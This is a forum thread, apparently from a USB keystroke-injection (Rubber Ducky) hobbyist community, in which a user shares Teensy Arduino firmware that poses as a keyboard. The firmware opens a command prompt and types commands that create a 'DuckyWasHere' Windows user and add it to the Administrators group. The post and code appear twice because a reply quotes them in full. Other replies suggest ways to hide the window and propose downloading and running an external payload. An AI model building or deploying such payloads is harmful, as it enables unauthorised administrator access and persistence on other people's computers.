[Version 1] My Ducky Code (Teensy Prototype)

[dmsmith1991]

Hi Everyone

Just wanted to share my first ducky code. It's similar to others that have been posted, but the keypress functions are modular and the ExecuteCommandViaRunWindow function gives you the option to minimise the executed program's window after it has been created. Simply specify 1 for the minimiseWindow argument, and 0 if you are executing something like notepad.exe which you don't want minimised.

The current payload creates a new user for windows named "DuckyWasHere" and adds it to the administrator group. Run "net user DuckyWasHere /delete" in command prompt to delete this account.

The delay values can probably be reduced; I have been testing on a low-spec desktop.

/*
Modular ducky code with windows minimising by w02057. Based on code by Irongeek.
*/

//***pin definitions***
int ledPin = 11;

void setup()
{
  pinMode(ledPin, OUTPUT);
}

void loop()
{
  delay(4000);
  digitalWrite(ledPin, HIGH); //turn on indicator LED
  ExecuteCommandViaRunWindow("cmd.exe", 0); //open cmd
  delay(1000);
  ExecuteCommand("net user DuckyWasHere quackquack /add"); //type out 1st command
  ExecuteCommand("net localgroup Administrators DuckyWasHere /add"); //type out 2nd command
  ExecuteCommand("exit"); //exit cmd
  digitalWrite(ledPin, LOW); //turn off indicator LED
  
  while(1); //halt code
}

void ExecuteCommand(char *command)
{
  Keyboard.print(command);
  delay(10);
  PressAndRelease(KEY_ENTER, 1);
  delay(100);
}

void ExecuteCommandViaRunWindow(char *command, int minimiseWindow)
{
  PressAndReleaseWithModifier(MODIFIERKEY_GUI, KEY_R); //open run command window
  delay(100); //delay to wait for run window to appear
  
  //***type command into run window and press enter***
  ExecuteCommand(command);
  
  //***minimise executed command window if minimiseWindow is set***
  if(minimiseWindow == 1)
  {
    delay(1000);
    PressAndReleaseWithModifier(MODIFIERKEY_ALT, KEY_SPACE);
    PressAndRelease(KEY_DOWN, 3);
    PressAndRelease(KEY_ENTER, 1);
  }
}

void PressAndRelease(int keyCode, int keyCount)
{
    int keyCounter=0;
    for(keyCounter=0; keyCounter<keyCount; keyCounter++)
    {
      Keyboard.set_key1(keyCode);
      Keyboard.send_now();
      delay(10);
      Keyboard.set_key1(0);
      Keyboard.send_now();
      delay(10);
    }
}

void PressAndReleaseWithModifier(int modifierKey, int keyCode)
{
  Keyboard.set_modifier(modifierKey);
  Keyboard.set_key1(keyCode);
  Keyboard.send_now();
  delay(10);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(10);
}

I hope this can help people who are struggling to get going on this project. This is my first attempt at writing code for the Teensy, the key functions should be all that is needed for key-based payloads.

Based on code by IronGeek

Any comments or suggestions would be appreciated.

Thanks,

David

Edited May 2, 2010 by w02057

[Vile]

Hi Everyone

Just wanted to share my first ducky code. It's similar to others that have been posted, but the keypress functions are modular and the ExecuteCommandViaRunWindow function gives you the option to minimise the executed program's window after it has been created. Simply specify 1 for the minimiseWindow argument, and 0 if you are executing something like notepad.exe which you don't want minimised.

The current payload creates a new user for windows named "DuckyWasHere" and adds it to the administrator group. Run "net user DuckyWasHere /delete" in command prompt to delete this account.

The delay values can probably be reduced; I have been testing on a low-spec desktop.

/*
Modular ducky code with windows minimising by w02057. Based on code by Irongeek.
*/

//***pin definitions***
int ledPin = 11;

void setup()
{
  pinMode(ledPin, OUTPUT);
}

void loop()
{
  delay(4000);
  digitalWrite(ledPin, HIGH); //turn on indicator LED
  ExecuteCommandViaRunWindow("cmd.exe", 0); //open cmd
  delay(1000);
  ExecuteCommand("net user DuckyWasHere quackquack /add"); //type out 1st command
  ExecuteCommand("net localgroup Administrators DuckyWasHere /add"); //type out 2nd command
  ExecuteCommand("exit"); //exit cmd
  digitalWrite(ledPin, LOW); //turn off indicator LED
  
  while(1); //halt code
}

void ExecuteCommand(char *command)
{
  Keyboard.print(command);
  delay(10);
  PressAndRelease(KEY_ENTER, 1);
  delay(100);
}

void ExecuteCommandViaRunWindow(char *command, int minimiseWindow)
{
  PressAndReleaseWithModifier(MODIFIERKEY_GUI, KEY_R); //open run command window
  delay(100); //delay to wait for run window to appear
  
  //***type command into run window and press enter***
  ExecuteCommand(command);
  
  //***minimise executed command window if minimiseWindow is set***
  if(minimiseWindow == 1)
  {
    delay(1000);
    PressAndReleaseWithModifier(MODIFIERKEY_ALT, KEY_SPACE);
    PressAndRelease(KEY_DOWN, 3);
    PressAndRelease(KEY_ENTER, 1);
  }
}

void PressAndRelease(int keyCode, int keyCount)
{
    int keyCounter=0;
    for(keyCounter=0; keyCounter<keyCount; keyCounter++)
    {
      Keyboard.set_key1(keyCode);
      Keyboard.send_now();
      delay(10);
      Keyboard.set_key1(0);
      Keyboard.send_now();
      delay(10);
    }
}

void PressAndReleaseWithModifier(int modifierKey, int keyCode)
{
  Keyboard.set_modifier(modifierKey);
  Keyboard.set_key1(keyCode);
  Keyboard.send_now();
  delay(10);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(10);
}

I hope this can help people who are struggling to get going on this project. This is my first attempt at writing code for the Teensy, the key functions should be all that is needed for key-based payloads.

Based on code by IronGeek

Any comments or suggestions would be appreciated.

Thanks,

David

Doing alt-space and just hitting "n" will minimize it without having to do all those arrow keys.

But again, This minimize thing would be useless for the actual part that eats up most of the time (the ducky actually typing the commands out, which wouldnt work if its minimized...) I doubt the commands they end up calling will take long enough time that requires it minimized, just the typing of the commands takes the longest

[dmsmith1991]

Doing alt-space and just hitting "n" will minimize it without having to do all those arrow keys.

But again, This minimize thing would be useless for the actual part that eats up most of the time (the ducky actually typing the commands out, which wouldnt work if its minimized...) I doubt the commands they end up calling will take long enough time that requires it minimized, just the typing of the commands takes the longest

Ok thanks for your suggestions. I was just exploring the windows minimising as it might be useful for some programs if they give suspicious output.

I have found that while a command is executing within command prompt, there is an input buffer which allows you to enter commands while this program is executing. This means that I can open command prompt, type all the commands within a few hundred milliseconds and they will all execute one after then other.

Edited May 3, 2010 by w02057

[haxwithaxe]

Despite it's limited use cases i think the minimize thing is a good idea to have implemented. I will be adding that to my code along with some other things like show desktop and I will also add support for macs and default linux configs.

I can see using this to let things run for a few seconds after the ducky is removed without a big black box being on the screen. Think downloading and executing and external payload.

[Maxwell8686]

^Nice

[overwraith]

I think I speak for a lot of duck scripters here when I say how do we program the duck with C++ like shown here? Did I miss a memo? Where the tutorial on that awesomeness?

[Dnucna]

It seems to be for a Teensy. First version of the Ducky. http://www.pjrc.com/teensy/

You code the firmware in arduino.

Take a look at irongeek's website: http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle

For each modification you need to flash the teensy. That's why the new ducky has a SD card reader.